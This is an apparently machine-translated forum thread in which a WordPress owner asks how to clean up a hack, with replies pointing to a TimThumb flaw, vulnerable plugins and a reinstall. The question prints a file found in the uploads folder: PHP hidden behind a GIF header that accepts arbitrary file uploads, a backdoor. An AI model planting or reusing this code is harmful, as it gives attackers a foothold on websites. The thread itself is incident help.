中创建了一个文件
410.php<?php header('HTTP/1.0 410 Gone'); ?>
在我的.htaccess apache文件中我添加了
RewriteEngine On
RewriteBase /
RewriteCond %{REMOTE_ADDR} ^188.138.56.125 [OR]
RewriteCond %{REMOTE_ADDR} ^188.138.56.125
RewriteRule ^.*$ 410.php [L]
i在我的wp-content/上载文件夹中也注意到了一个带有内容
GIF89a^A^@^A^@<80>^@^@<FF><FF><FF>^@^@^@!<F9>^D^A^@^@^@^@,^@^@^@^@^A^@^A^@^@^B^BD^A^@;^@<?php $f=preg_replace('/(.*wp-content).*/i','\1',di
rname(__FILE__)).DIRECTORY_SEPARATOR.'uploads'.DIRECTORY_SEPARATOR.$_FILES['F']['name'];move_uploaded_file($_FILES['F']['tmp_name'],$f);ech
o "14qhpo"; ?>^@;
和其中一个目录,其中包含我的WordPress文件的777个权限,我也已删除。 我将在干净的目录中使用新的数据和插件来重新安装我的WordPress,但是我该如何防止它,或者更好地监视它?黑客做了什么,我该如何防止它/修复损害?
我在这里看到其他人也有相同的黑客攻击。 Edit11/23 trangely,我认为我粘贴的第一个代码可能是我刚刚安装的websitedefender.com的插件安全扫描/
,
http://wordpress.org/extend/plugins/websitedefender-wordpress-security/没有什么可担心的(至少对于此问题),因为该文件和代码是标准的Websitedefender.com Sitecheck文件。我想您将其上传到您的网站并忘记了吗?
可能是Timthumb.php漏洞。 如果timthumb.php文件在系统上的任何位置,请确保将其删除。 您可能已经被多个人砍掉了,因此最好备份数据库并从最新版本中重新安装数据库并重新安装。要检测您的应用程序中的漏洞,我建议使用漏洞扫描服务(例如siteWatch或诸如Skipfish的程序)测试您的网站。
我发生了类似的事情。 弱点肯定是插件,尤其是Akismet,但也是一些SEO插件。 这些可以允许注射攻击或更糟。